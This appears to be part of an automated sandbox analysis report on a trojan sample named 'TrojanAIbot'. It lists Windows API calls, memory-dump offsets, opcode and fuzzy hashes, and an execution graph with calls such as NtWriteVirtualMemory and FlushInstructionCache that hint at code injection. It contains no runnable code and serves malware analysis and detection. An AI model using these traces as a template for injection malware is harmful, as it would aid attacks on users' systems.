                                                                                                                  • Instruction Fuzzy Hash: EB11D0B6C002498FDB14CF9AC844ADEBBF4EF88324F14842AD859A7250D378A645CFA5
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,?,?,?), ref: 065BFCCD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: bd09b292cb56768c97f1703a6dc7deb5eb792ec4f1e975156d296741ca6a71f9
                                                                                                                  • Instruction ID: 975a61cc7feb22b0bf24ad3989f606c79760345c699929deb36d97146730e904
                                                                                                                  • Opcode Fuzzy Hash: bd09b292cb56768c97f1703a6dc7deb5eb792ec4f1e975156d296741ca6a71f9
                                                                                                                  • Instruction Fuzzy Hash: 5D1106B5D002499FDB10DF99D985BDEBBF8FB48320F10841AD918A7640C375A594CFA6
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7D67E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4533326925.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_2f70000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: 0a9cd5ecfc5c7960fdf7025805a828274245a01068a4139cbacbbeee3bff2cc8
                                                                                                                  • Instruction ID: f503d239e25cdde2a84a1144d5293430a1d44b9943ef523bf2d5d79bb5355ff5
                                                                                                                  • Opcode Fuzzy Hash: 0a9cd5ecfc5c7960fdf7025805a828274245a01068a4139cbacbbeee3bff2cc8
                                                                                                                  • Instruction Fuzzy Hash: DC11DFB5C002498FDB10DF9AD844A9EFBF4EF88214F11846AD519A7210D379A545CFA5
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,?,?,?), ref: 065BFCCD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: 555538d50bf2abcb57e9695f2bfde163de28bb62373d30fdd6deda309b0657b1
                                                                                                                  • Instruction ID: 5ce30e9544a5eadfb21282266ea7a563139bd4e7ade51f505a7cb90b22344b8e
                                                                                                                  • Opcode Fuzzy Hash: 555538d50bf2abcb57e9695f2bfde163de28bb62373d30fdd6deda309b0657b1
                                                                                                                  • Instruction Fuzzy Hash: C31106B5804349DFDB50DF99D948BDEBBF8FB48310F108459E918A7200D375A994CFA5
                                                                                                                  APIs
                                                                                                                  • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 065B4115
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1378638983-0
                                                                                                                  • Opcode ID: 4d4cc734c89aa41ffb148cd0750638da82ce349b37bc75bc14f4dcc563776485
                                                                                                                  • Instruction ID: cf4792a29f1df311a73ee9dee41183b908d5d0f3ce1f26ac517af3a2986ff775
                                                                                                                  • Opcode Fuzzy Hash: 4d4cc734c89aa41ffb148cd0750638da82ce349b37bc75bc14f4dcc563776485
                                                                                                                  • Instruction Fuzzy Hash: 441133B5C002099FDB10CF89C985BDEBBF8FB48320F24841AE918A3300C378A944CFA1
                                                                                                                  APIs
                                                                                                                  • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 065B4115
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1378638983-0
                                                                                                                  • Opcode ID: 7bee932071dc0630141d0b36987ff286068a558c07d4e4ca64f52ae96f29a3c4
                                                                                                                  • Instruction ID: 2eb4456db499e21737c1c7bff247175dee0e7692b9bfcf5fc75f1a76ad7d0946
                                                                                                                  • Opcode Fuzzy Hash: 7bee932071dc0630141d0b36987ff286068a558c07d4e4ca64f52ae96f29a3c4
                                                                                                                  • Instruction Fuzzy Hash: 191106B5C002499FDB20DF99D485BDEBBF8FB58310F108459D919A7301D374A954CFA6
                                                                                                                  APIs
                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06633687), ref: 06634125
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DispatchMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2061451462-0
                                                                                                                  • Opcode ID: 6012eb501b0b6e8153ae010b5c936de690168706091e131637082c7fc817c438
                                                                                                                  • Instruction ID: 6450c9220fb5c0fa948821e69d4fd66a06f0d748a6ba4280aa99a60efd9d0b7a
                                                                                                                  • Opcode Fuzzy Hash: 6012eb501b0b6e8153ae010b5c936de690168706091e131637082c7fc817c438
                                                                                                                  • Instruction Fuzzy Hash: 2C11FEB5C046598FCB20DF9AD848BDEFBF4EB48310F10846AE419A7200D378A954CFA6
                                                                                                                  APIs
                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0663319D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538663250-0
                                                                                                                  • Opcode ID: 06e9003456bb1033befa8d818d58d9510c381012d2ee9611c0cf0d7c02a5ccbc
                                                                                                                  • Instruction ID: 39ad50032bb927205abe27ebb8e8e2d8893c3ddc15da42e46df979c6b40479ee
                                                                                                                  • Opcode Fuzzy Hash: 06e9003456bb1033befa8d818d58d9510c381012d2ee9611c0cf0d7c02a5ccbc
                                                                                                                  • Instruction Fuzzy Hash: A21130B5C002498FCB10CF99D949BDEBBF4EB08220F20841AD419A7740D378AA48CFA2
                                                                                                                  APIs
                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0663319D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538663250-0
                                                                                                                  • Opcode ID: 335f3b4d584c6c0afc7e5fe64a432c33ddcf08f204f486e21b6136f6690f4548
                                                                                                                  • Instruction ID: 3335146461f6bf38986cc85108b4f6c924be72fe4124851660832420a575265a
                                                                                                                  • Opcode Fuzzy Hash: 335f3b4d584c6c0afc7e5fe64a432c33ddcf08f204f486e21b6136f6690f4548
                                                                                                                  • Instruction Fuzzy Hash: 291112B5D003498FDB60DF9AD448B9EBBF8EB48321F208459D519B7300D375A944CFA6
                                                                                                                  APIs
                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06633687), ref: 06634125
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DispatchMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2061451462-0
                                                                                                                  • Opcode ID: e17cc20772c6fd0e33d0d0ff65fdae337b11f848a36d210dcfeffacc37251c65
                                                                                                                  • Instruction ID: e413cde17367e5e25d0f9091127513d068054cce44f16d4e71337c650018b05b
                                                                                                                  • Opcode Fuzzy Hash: e17cc20772c6fd0e33d0d0ff65fdae337b11f848a36d210dcfeffacc37251c65
                                                                                                                  • Instruction Fuzzy Hash: 6D1100B5D006598FCB10CF9AD944BDEFBF4EB48320F10842AD418B3640D378A544CFA6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4527761809.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_158d000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9ba6ffbcd2b19059771ce8b55f2023f17b4dd9d7cccc902dd6e1f0262f90df1d
                                                                                                                  • Instruction ID: 4286980d412684a91c9d86f7c0771413d265521dbb843c18082f59034120ba25
                                                                                                                  • Opcode Fuzzy Hash: 9ba6ffbcd2b19059771ce8b55f2023f17b4dd9d7cccc902dd6e1f0262f90df1d
                                                                                                                  • Instruction Fuzzy Hash: 052100B1604204EFDB15EF98D980B2ABBF5FB84314F24C96DD84A5F286D33AD407CA61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4527761809.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_158d000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4f8d6c901c04bb6f258cb412e08f61f2d1a1ed6b74c6158153b0dcbf6c2fd4ff
                                                                                                                  • Instruction ID: 0d20d40cbc80aa2d85b6753b630898e92041097dbd92a8f43488fde788b9e8b9
                                                                                                                  • Opcode Fuzzy Hash: 4f8d6c901c04bb6f258cb412e08f61f2d1a1ed6b74c6158153b0dcbf6c2fd4ff
                                                                                                                  • Instruction Fuzzy Hash: 36216D75509380CFDB02DF64D594715BFB1FB46214F28C5DAD8498F6A7C33A980ACB62
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4527460271.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_157d000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 48cbc4c77e5765ff797b3fdeee8f9c9c4b245492fec13e15296bb12b6d679a8e
                                                                                                                  • Instruction ID: 3a5150c335c5c0d9d07cfe652223ac1a6796ae8ac6c180b44058e669516dfb66
                                                                                                                  • Opcode Fuzzy Hash: 48cbc4c77e5765ff797b3fdeee8f9c9c4b245492fec13e15296bb12b6d679a8e
                                                                                                                  • Instruction Fuzzy Hash: 9F01A7710053449AE7125AA9EC85767BFF8FF413A0F18D85AED090F286E2799845CA71
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4527460271.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_157d000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fd54e826408386121acf84bce1f788bdbcac3446af37ed8c81b3aab2ba65e15c
                                                                                                                  • Instruction ID: ca4e02b5614ed4dae57ff03d56dd3334473f0981baba9cbd15a2f6108285717c
                                                                                                                  • Opcode Fuzzy Hash: fd54e826408386121acf84bce1f788bdbcac3446af37ed8c81b3aab2ba65e15c
                                                                                                                  • Instruction Fuzzy Hash: 06F0CD71404340AEE7118A1AEC84B67FFA8FF412B4F18C45AED080F286D3B99845CAB1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.2254173221.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_fc0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f9f45b0fd48a799c717c53218161ea32a5b296675d72f50616f2624b2acb6ef9
                                                                                                                  • Instruction ID: 56c364c3921dbe905f7753dfee5e5e2af56b3375062d903f1bef72e378e4512e
                                                                                                                  • Opcode Fuzzy Hash: f9f45b0fd48a799c717c53218161ea32a5b296675d72f50616f2624b2acb6ef9
                                                                                                                  • Instruction Fuzzy Hash: B362BF70A01219CFCB65EF64D894B9DBBB2FF88700F1085A9D44AAB364DB315E86CF41
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.2254173221.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_fc0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6d89052c727803a5e0111e6b9e774e719e1104221cd10e1c487183c9ff06b888
                                                                                                                  • Instruction ID: 58063c00b8dc1eb627964cd8ac25b507674a14d1405279449e3954c2dd83f739
                                                                                                                  • Opcode Fuzzy Hash: 6d89052c727803a5e0111e6b9e774e719e1104221cd10e1c487183c9ff06b888
                                                                                                                  • Instruction Fuzzy Hash: E662AF74A01219CFDB64EF64D894B9DBBB2FF88700F1085A9D44AAB364DB315E86CF41
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.2254173221.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_fc0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: adb16a39d8ea6689c25b36cd3a5d64e97527146d4809cd54f6ecf2d5d11d96d7
                                                                                                                  • Instruction ID: 274dbddcb6ae43eb6ed64423cfb21b780158b0d51780fd9d17b36f2d8a7db77d
                                                                                                                  • Opcode Fuzzy Hash: adb16a39d8ea6689c25b36cd3a5d64e97527146d4809cd54f6ecf2d5d11d96d7
                                                                                                                  • Instruction Fuzzy Hash: 79117C70D4925A9FCB00AFB4C91C7AD7FF0EB06301F0458AEC455A72E2C7784649EB51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.2254173221.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_fc0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2f6f68e0b1aae7800274721440c696bef78fe844cf3202d14daf52e5037d71ec
                                                                                                                  • Instruction ID: 09e4db8b0654021bbdf232cbfc8a089c7ea00032521cc2c4d10045a2d7ec56c6
                                                                                                                  • Opcode Fuzzy Hash: 2f6f68e0b1aae7800274721440c696bef78fe844cf3202d14daf52e5037d71ec
                                                                                                                  • Instruction Fuzzy Hash: 07015AB0C0021ADFCB04EFB5C51DBAEBBF0EB05312F0098A9C415A3290DB780688EF91

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:8.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:1301
                                                                                                                  Total number of Limit Nodes:21
                                                                                                                  execution_graph 28109 2dcc350 28112 2dbf7c8 28109->28112 28111 2dcc358 28113 2dbf7d0 28112->28113 28113->28113 29205 2db88b8 28113->29205 28115 2dbf7f1 28116 2dbf7f6 28115->28116 28117 2dbf850 28116->28117 28118 2dbf87b 28117->28118 29211 2db89d0 28118->29211 28120 2dbf88e 28121 2dbf8b4 28120->28121 28122 2dbf8df 28121->28122 28123 2db89d0 4 API calls 28122->28123 28124 2dbf8f2 28123->28124 28125 2dbf918 28124->28125 28126 2dbf922 28125->28126 28127 2db89d0 4 API calls 28126->28127 28128 2dbf956 28127->28128 28129 2dbf986 28128->28129 28130 2db89d0 4 API calls 28129->28130 28131 2dbf9ba 28130->28131 28132 2dbf9ea 28131->28132 28133 2db89d0 4 API calls 28132->28133 28134 2dbfa1e 28133->28134 28135 2dbfa3c 28134->28135 28136 2dbfa4e 28135->28136 28137 2db89d0 4 API calls 28136->28137 28138 2dbfa82 28137->28138 28139 2dbfaa0 28138->28139 28140 2dbfad3 28139->28140 28141 2db89d0 4 API calls 28140->28141 28142 2dbfae6 28141->28142 28143 2dcb2f8 28142->28143 28144 2dbfaf3 28142->28144 29221 2dbf744 28144->29221 28146 2dbfaf8 28146->28143 28147 2dbfb1e 28146->28147 28148 2db89d0 4 API calls 28147->28148 28149 2dbfb27 28148->28149 28150 2db89d0 4 API calls 28149->28150 28151 2dbfb4e 28150->28151 28152 2db89d0 4 API calls 28151->28152 28153 2dbfb81 28152->28153 28154 2dbfbd9 28153->28154 28155 2dbfbf1 28154->28155 28156 2db89d0 4 API calls 28155->28156 28157 2dbfbfd 28156->28157 28158 2db89d0 4 API calls 28157->28158 28159 2dbfc30 28158->28159 28160 2dbfc40 28159->28160 28161 2dbfc57 28160->28161 28162 2db89d0 4 API calls 28161->28162 28163 2dbfc63 28162->28163 28164 2db89d0 4 API calls 28163->28164 28165 2dbfc96 28164->28165 28166 2dbfcf9 28165->28166 28167 2dbfd06 28166->28167 28168 2db89d0 4 API calls 28167->28168 28169 2dbfd12 28168->28169 28170 2dbfd75 28169->28170 28171 2db89d0 4 API calls 28170->28171 28172 2dbfd8e 28171->28172 28173 2db89d0 4 API calls 28172->28173 28174 2dbfdc1 28173->28174 28175 2db89d0 4 API calls 28174->28175 28176 2dbfdf4 28175->28176 28177 2db89d0 4 API calls 28176->28177 28178 2dbfe27 28177->28178 28179 2dbfe48 28178->28179 28180 2dbfe7f 28179->28180 28181 2db89d0 4 API calls 28180->28181 28182 2dbfea3 28181->28182 28183 2dbfeb3 28182->28183 28184 2db89d0 4 API calls 28183->28184 28185 2dbfed6 28184->28185 28186 2dbfefd 28185->28186 28187 2db89d0 4 API calls 28186->28187 28188 2dbff09 28187->28188 28189 2dbff30 28188->28189 28190 2db89d0 4 API calls 28189->28190 28191 2dbff3c 28190->28191 28192 2dbff75 28191->28192 28193 2db89d0 4 API calls 28192->28193 28194 2dbffb8 28193->28194 28195 2dbffe4 28194->28195 28196 2db89d0 4 API calls 28195->28196 28197 2dc0034 28196->28197 28198 2dc005b 28197->28198 28199 2db89d0 4 API calls 28198->28199 28200 2dc0067 28199->28200 28201 2db89d0 4 API calls 28200->28201 28202 2dc009a 28201->28202 28203 2db89d0 4 API calls 28202->28203 28204 2dc00cd 28203->28204 28205 2db89d0 4 API calls 28204->28205 28206 2dc0149 28205->28206 28207 2db89d0 4 API calls 28206->28207 28208 2dc01c5 28207->28208 28209 2db89d0 4 API calls 28208->28209 28210 2dc0241 28209->28210 28211 2db89d0 4 API calls 28210->28211 28212 2dc02bd 28211->28212 28213 2dc02cc 28212->28213 28214 2dc0327 28213->28214 28215 2dc033f 28214->28215 28216 2db89d0 4 API calls 28215->28216 28217 2dc0382 28216->28217 28218 2dc03a3 28217->28218 28219 2dc03bb 28218->28219 28220 2db89d0 4 API calls 28219->28220 28221 2dc03fe 28220->28221 28222 2dc0414 28221->28222 28223 2dc0534 28222->28223 28224 2dc0427 28222->28224 28226 2dc0555 28223->28226 28225 2dc0448 28224->28225 28228 2db89d0 4 API calls 28225->28228 28227 2db89d0 4 API calls 28226->28227 28229 2dc05b0 28227->28229 28230 2dc04a3 28228->28230 28232 2dc05d1 28229->28232 28231 2dc04c4 28230->28231 28234 2db89d0 4 API calls 28231->28234 28233 2db89d0 4 API calls 28232->28233 28235 2dc051f 28233->28235 28234->28235 28236 2dc052f 28235->28236 28237 2dc066d 28236->28237 28238 2db89d0 4 API calls 28237->28238 28239 2dc06c8 28238->28239 28240 2dc06e9 28239->28240 28241 2db89d0 4 API calls 28240->28241 28242 2dc0744 28241->28242 28243 2dc0751 28242->28243 28244 2dc0794 28243->28244 28245 2dc07ec 28244->28245 28246 2dc0804 28245->28246 28247 2db89d0 4 API calls 28246->28247 28248 2dc0810 28247->28248 28249 2dc0880 28248->28249 28250 2db89d0 4 API calls 28249->28250 28251 2dc088c 28250->28251 28252 2dc08fc 28251->28252 28253 2db89d0 4 API calls 28252->28253 28254 2dc0908 28253->28254 28255 2dc0978 28254->28255 28256 2db89d0 4 API calls 28255->28256 28257 2dc0984 28256->28257 28258 2dc09c5 28257->28258 28259 2dc09fc 28258->28259 28260 2dc0a07 28259->28260 28261 2db89d0 4 API calls 28260->28261 28262 2dc0a20 28261->28262 28263 2dc0a41 28262->28263 28264 2dc0a4c 28263->28264 28265 2dc0a78 28264->28265 28266 2dc0a83 28265->28266 28267 2db89d0 4 API calls 28266->28267 28268 2dc0a9c 28267->28268 28269 2dc0abd 28268->28269 28270 2dc0ac8 28269->28270 28271 2dc0aff 28270->28271 28272 2db89d0 4 API calls 28271->28272 28273 2dc0b18 28272->28273 28274 2dc0b22 28273->28274 28275 2dc0b2f 28274->28275 28276 2dc12fe 28275->28276 28277 2dc0b42 28275->28277 28278 2dc132a 28276->28278 28279 2dc0b63 28277->28279 28280 2dc1337 28278->28280 28282 2dc0b9a 28279->28282 28281 2dc1356 28280->28281 28283 2dc136e 28281->28283 28284 2dc0bb2 28282->28284 28285 2db89d0 4 API calls 28283->28285 28286 2db89d0 4 API calls 28284->28286 28287 2dc137a 28285->28287 28288 2dc0bbe 28286->28288 28289 2dc13a6 28287->28289 28290 2dc0bdf 28288->28290 28291 2dc13b3 28289->28291 28293 2dc0c16 28290->28293 28292 2dc13d2 28291->28292 28294 2dc13ea 28292->28294 28295 2dc0c2e 28293->28295 28296 2db89d0 4 API calls 28294->28296 28297 2db89d0 4 API calls 28295->28297 28300 2dc13f6 28296->28300 28298 2dc0c3a 28297->28298 28299 2dc0c5b 28298->28299 28301 2dc0c66 28299->28301 28302 2dc142f 28300->28302 28304 2dc0c92 28301->28304 28303 2dc144e 28302->28303 28305 2dc1466 28303->28305 28307 2db89d0 4 API calls 28304->28307 28306 2db89d0 4 API calls 28305->28306 28308 2dc1472 28306->28308 28309 2dc0cb6 28307->28309 28310 2dc1494 28308->28310 28311 2dc0cd8 28309->28311 28314 2dc14d0 28310->28314 28312 2dc0d09 28311->28312 28313 2dc0d14 28312->28313 28317 2dc0d40 28313->28317 28315 2dc14fc 28314->28315 28316 2dc1507 28315->28316 28319 2dc1514 28316->28319 28318 2dc0d58 28317->28318 28321 2db89d0 4 API calls 28318->28321 28320 2db89d0 4 API calls 28319->28320 28322 2dc1520 28320->28322 28323 2dc0d64 28321->28323 28325 2dc154c 28322->28325 28324 2dc0d85 28323->28324 28328 2dc0d90 28324->28328 28326 2dc1578 28325->28326 28327 2dc1583 28326->28327 28330 2dc1590 28327->28330 28329 2dc0dd4 28328->28329 28332 2db89d0 4 API calls 28329->28332 28331 2db89d0 4 API calls 28330->28331 28333 2dc159c 28331->28333 28334 2dc0de0 28332->28334 28336 2dc15c8 28333->28336 29225 2da4860 28334->29225 28340 2dc15ff 28336->28340 28337 2dc0e01 28338 2dc0e43 28337->28338 28339 2dc0e50 28338->28339 28342 2db89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28339->28342 28341 2db89d0 4 API calls 28340->28341 28345 2dc1618 28341->28345 28343 2dc0e5c 28342->28343 28344 2dc0e71 28343->28344 28348 2dc0e84 28344->28348 28346 2dc1640 28345->28346 28347 2dc1661 28346->28347 28349 2dc1679 28347->28349 28350 2dc0ebd 28348->28350 28353 2dc16a3 28349->28353 28351 2dc0ee7 28350->28351 28352 2dc0ef4 28351->28352 28355 2db89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28352->28355 28354 2db89d0 4 API calls 28353->28354 28356 2dc16bc 28354->28356 28357 2dc0f00 28355->28357 28359 2dc16dd 28356->28359 28358 2dc0f39 28357->28358 28360 2dc0f63 28358->28360 28362 2dc171f 28359->28362 28361 2dc0f70 28360->28361 28364 2db89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28361->28364 28363 2db89d0 4 API calls 28362->28363 28367 2dc1738 28363->28367 28365 2dc0f7c 28364->28365 28366 2dc0f9d 28365->28366 28369 2dc12f9 28365->28369 28370 2dc0fbe 28366->28370 28368 2dc1790 28367->28368 28371 2dc179b 28368->28371 28372 2dc2b11 28369->28372 28376 2dc0ff5 28370->28376 28373 2dc17a8 28371->28373 28378 2dc2b3b 28372->28378 28374 2db89d0 4 API calls 28373->28374 28375 2dc17b4 28374->28375 28381 2dc17c3 28375->28381 28377 2dc100d 28376->28377 28380 2db89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28377->28380 28379 2db89d0 4 API calls 28378->28379 28384 2dc2b54 28379->28384 28382 2dc1019 28380->28382 28386 2dc17fe 28381->28386 28383 2dc103a 28382->28383 28385 2dc1045 28383->28385 28389 2dc2b8d 28384->28389 28390 2dc1071 28385->28390 28387 2dc182a 28386->28387 28388 2dc1835 28387->28388 28391 2dc1842 28388->28391 28392 2dc2bc4 28389->28392 28393 2dc1089 28390->28393 28394 2db89d0 4 API calls 28391->28394 28396 2db89d0 4 API calls 28392->28396 28397 2db89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28393->28397 28395 2dc184e 28394->28395 28401 2dc187a 28395->28401 28400 2dc2bd0 28396->28400 28398 2dc1095 28397->28398 28399 2dc10b6 28398->28399 28405 2dc10c1 28399->28405 28404 2dc2c09 28400->28404 28402 2dc18a6 28401->28402 28403 2dc18b1 28402->28403 28406 2dc18be 28403->28406 28409 2dc2c40 28404->28409 28407 2dc1105 28405->28407 28408 2db89d0 4 API calls 28406->28408 28412 2db89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28407->28412 28410 2dc18ca 28408->28410 28411 2db89d0 4 API calls 28409->28411 28410->28369 28415 2dc18dc 28410->28415 28416 2dc2c4c 28411->28416 28413 2dc1111 28412->28413 28414 2da4860 28413->28414 28420 2dc1132 28414->28420 28417 2dc18fd 28415->28417 28418 2dc2c78 28416->28418 28424 2dc1915 28417->28424 28419 2dc2ca4 28418->28419 28422 2dc2caf 28419->28422 28421 2dc1174 28420->28421 28423 2dc1181 28421->28423 28425 2db89d0 4 API calls 28422->28425 28426 2db89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28423->28426 28429 2db89d0 4 API calls 28424->28429 28427 2dc2cc8 28425->28427 28428 2dc118d 28426->28428 28427->28143 28433 2dc2ced 28427->28433 28430 2dc11ae 28428->28430 28431 2dc1958 28429->28431 28434 2dc11b9 28430->28434 28432 2dc1979 28431->28432 28437 2dc1991 28432->28437 28438 2dc2d26 28433->28438 28435 2dc11f0 28434->28435 28436 2db89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28435->28436 28439 2dc1209 28436->28439 28440 2db89d0 4 API calls 28437->28440 28441 2db89d0 4 API calls 28438->28441 28442 2dc1213 28439->28442 28443 2dc19d4 28440->28443 28444 2dc2d69 28441->28444 28445 2dc1220 28442->28445 28446 2dc19de 28443->28446 28449 2dc2da2 28444->28449 28447 2dc129e 28445->28447 28452 2dc1a39 28446->28452 28448 2dc12b6 28447->28448 28451 2dc12d5 28448->28451 28450 2db89d0 4 API calls 28449->28450 28455 2dc2de5 28450->28455 28453 2dc12e0 28451->28453 28454 2dc1a70 28452->28454 28457 2db89d0 